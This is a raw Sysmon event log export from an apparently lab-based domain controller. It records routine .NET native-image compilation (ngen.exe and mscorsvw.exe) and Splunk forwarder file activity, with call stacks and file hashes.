21:07:21.092{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A289-60D3-F605-00000000CF01}3716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023857Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.092{4DB9351A-A289-60D3-F505-00000000CF01}6300NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\LJYR9YEDJM\System.Web.DynamicData.Design.ni.dll.auxMD5=F5D1405FE8370BE873288468988C4217,SHA256=70F3773A95423389A444F2419B8019D04340719E1DC5B3DC7DD1DDA7D2673189,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023856Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.092{4DB9351A-A289-60D3-F505-00000000CF01}6300NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\LJYR9YEDJM\System.Web.DynamicData.Design.ni.dllMD5=DD711B6A62CDCC52E7808B8B5C0E7A2A,SHA256=983D5699D9624C47F520256DF4ADE942179F97C797CC14D5E9A817109EE5264E,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023855Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.076{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0A88DF6A433AB3A3FA40CC8A3510A8A,SHA256=79201B08A672B52BF28F3BBD9457FDE7B41C018989D5E552236E9CBAA977D4AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023854Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.076{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A289-60D3-F505-00000000CF01}6300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023853Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.061{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A289-60D3-F505-00000000CF01}6300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023852Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.061{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A289-60D3-F505-00000000CF01}6300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023851Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.061{4DB9351A-A288-60D3-F405-00000000CF01}6568NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ACR23TTTB3\System.Web.DynamicData.ni.dll.auxMD5=9DEE7EB2EC47612C69A4F9FC405479AC,SHA256=499AEA8D81951119235D65118A4A80E3E237B2E2332E6EEF0DEFBB713EFD0F2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023850Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.061{4DB9351A-A288-60D3-F405-00000000CF01}6568NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ACR23TTTB3\System.Web.DynamicData.ni.dllMD5=2EB13B5C7EABC01FA7C1FBC93F0C02A9,SHA256=E4C6DD0D358F20F115FE3E3DA6BCC12829FC1107C096D37C1345C7F746204736,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023849Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.014{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A288-60D3-F405-00000000CF01}6568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023912Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:22.748{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28A-60D3-FF05-00000000CF01}6520C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023911Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:22.748{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A28A-60D3-FF05-00000000CF01}6520C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023910Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:22.748{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28A-60D3-FF05-00000000CF01}6520C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023909Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:22.733{4DB9351A-A28A-60D3-FE05-00000000CF01}4356NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\2G6NWFQQ1P\System.Windows.Controls.Ribbon.ni.dll.auxMD5=A165D14ABD01C590D9D27F92718BF71E,SHA256=3AEFEDC85051614014D949CCC1C3E03821CB1449704F537DB58789A11E6590FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023908Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:22.733{4DB9351A-A28A-60D3-FE05-00000000CF01}4356NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\2G6NWFQQ1P\System.Windows.Controls.Ribbon.ni.dllMD5=27F412946E8CC61C4517790E69D7514D,SHA256=EEB4370364F4CBC6A4CF9B6BEC2E48AFF1151921D7564E1DBF3396E59113C832,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023907Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:22.655{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D5FDB359A31F69494242FBF96B4412EA,SHA256=BB7B0A9F241147AA6F6F4A6D62CCCE8849AF8550512D5E679D67F75D5938D49F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023906Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:22.655{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEE552B529E757419CC6ED5661101A06,SHA256=9923DBD3E7D358A55DB1C11D124949FC39D0FB3F4D2545672C2C00EF9B6C5D47,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023905Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:22.639{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28A-60D3-FE05-00000000CF01}4356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023904Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:22.623{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A28A-60D3-FE05-00000000CF01}4356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023903Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:22.623{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28A-60D3-FE05-00000000CF01}4356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023902Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:22.623{4DB9351A-A28A-60D3-FD05-00000000CF01}6624NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BP4XNVEN38\System.Web.Routing.ni.dll.auxMD5=AEAFF93481F01DB309CD2979BB7B8785,SHA256=38DBFDBDCA3E997D68707E5AFEA338DE54937CE10BC675BD45900441681EEAA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023901Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:22.623{4DB9351A-A28A-60D3-FD05-00000000CF01}6624NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BP4XNVEN38\System.Web.Routing.ni.dllMD5=B977E269F223F229E51C01BF50C3EA34,SHA256=33D5ED886FCAF4369B45ED71B807A7AA7AB99E168E30E0D84B18030D87856EBE,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023900Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:22.608{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28A-60D3-FD05-00000000CF01}6624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023899Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:22.592{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A28A-60D3-FD05-00000000CF01}6624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023898Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:22.592{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28A-60D3-FD05-00000000CF01}6624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023897Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:22.592{4DB9351A-A289-60D3-FC05-00000000CF01}5592NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\J3RN5MMXEO\System.Web.ni.dll.auxMD5=6BFFACEE014A7E604192C9B1E5533A08,SHA256=7353EC674647A4839F025ED32D1A0D407F9DC649CF7D2D0FE04EBB81D8136584,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023896Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:22.592{4DB9351A-A289-60D3-FC05-00000000CF01}5592NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\J3RN5MMXEO\System.Web.ni.dllMD5=815A985E31B0A61007E5D0D052B690F9,SHA256=E1932819DD9448BA21090180E3F259AF62708A1E752179E1EEAA770597694D4B,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023895Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:22.139{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=26C4311BFCBB8EB31A0E9F478E07E9E3,SHA256=2A7AC2F65EB5607F001EAB6BF6B622B63F9E96F109A279AE433D6A739905B945,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023955Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.936{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28B-60D3-0706-00000000CF01}2036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023954Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.920{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A28B-60D3-0706-00000000CF01}2036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023953Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.920{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28B-60D3-0706-00000000CF01}2036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NE